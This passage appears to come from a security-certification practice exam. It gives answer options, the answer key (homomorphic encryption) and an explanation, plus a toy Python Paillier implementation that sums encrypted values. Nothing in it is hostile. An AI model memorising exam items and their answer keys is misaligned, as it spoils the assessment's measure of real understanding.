  • A. Asynchronous keys
  • B. Homomorphic encryption
  • C. Data lake
  • D. Machine learning

Answer: B

Explanation:
The organization is implementing homomorphic encryption. Homomorphic encryption is a type of encryption that allows computations to be performed on encrypted data without decrypting it first. This means that the organization can analyze the customers' data and deliver analysis results without being able to see the raw data, preserving the privacy and confidentiality of the customers. Homomorphic encryption can enable various applications, such as cloud computing, machine learning, and data analytics, that require processing sensitive data without compromising security. Verified Reference:
https://www.techtarget.com/searchsecurity/definition/homomorphic-encryption
https://learn.microsoft.com/en-us/azure/security/fundamentals/encryption-at-rest
https://www.ibm.com/topics/homomorphic-encryption
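To make "computation on data that stays encrypted" concrete, here is an added example written for this page (not from the exam or the references above): a working Paillier cryptosystem, which is additively homomorphic, in the third-party analysis setting from the question. The customer keeps the private key and sends only ciphertexts; the analyst adds and scales those ciphertexts and returns an encrypted result. The 10-bit primes are chosen for readability and are an assumption of the example, as are the sample salary figures; a real deployment uses a 2048-bit or larger modulus.

```python
import math
import secrets

# Toy primes for readability only (a real modulus is 2048 bits or more).
P, Q = 1009, 1013


def keygen(p, q):
    """Paillier key pair with the common choice g = n + 1."""
    n = p * q
    lam = math.lcm(p - 1, q - 1)
    # With g = n + 1, L(g^lam mod n^2) = lam (mod n), so mu = lam^-1 mod n.
    mu = pow(lam, -1, n)
    return (n, n + 1), (lam, mu)


def encrypt(pub, m):
    """c = g^m * r^n mod n^2 with fresh random r; the customer runs this."""
    n, g = pub
    n2 = n * n
    if not 0 <= m < n:
        raise ValueError("plaintext must be in [0, n)")
    while True:
        r = secrets.randbelow(n)
        if r and math.gcd(r, n) == 1:
            break
    return (pow(g, m, n2) * pow(r, n, n2)) % n2


def decrypt(pub, priv, c):
    """m = L(c^lam mod n^2) * mu mod n, where L(u) = (u - 1) / n; only the customer can do this."""
    n, _ = pub
    lam, mu = priv
    n2 = n * n
    l_value = (pow(c, lam, n2) - 1) // n
    return (l_value * mu) % n


def add_ciphertexts(pub, c1, c2):
    """E(m1) * E(m2) mod n^2 = E(m1 + m2 mod n): the analyst adds without seeing m1 or m2."""
    n, _ = pub
    return (c1 * c2) % (n * n)


def scale_ciphertext(pub, c, k):
    """E(m)^k mod n^2 = E(k * m mod n): multiply an encrypted value by a public constant."""
    n, _ = pub
    return pow(c, k, n * n)


def encrypted_total(pub, ciphertexts):
    """Analyst side: sum a list of encrypted values, starting from an encryption of 0."""
    total = encrypt(pub, 0)
    for c in ciphertexts:
        total = add_ciphertexts(pub, total, c)
    return total


if __name__ == "__main__":
    pub, priv = keygen(P, Q)
    salaries = [52000, 61000, 58500]            # constructed customer data
    cts = [encrypt(pub, s) for s in salaries]   # customer encrypts and sends
    enc_sum = encrypted_total(pub, cts)         # analyst computes on ciphertexts
    print("analyst sees only ciphertexts such as", hex(cts[0])[:18], "...")
    print("customer decrypts total:", decrypt(pub, priv, enc_sum), "expected", sum(salaries))
```

Two properties matter in practice: results wrap modulo n, so the plaintext space has to be sized for the largest sum the analysis can produce, and the analyst learns nothing from the ciphertexts but also cannot verify that the customer encrypted honest inputs; fully homomorphic schemes extend the same idea to multiplication of two ciphertexts at a far higher computational cost.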

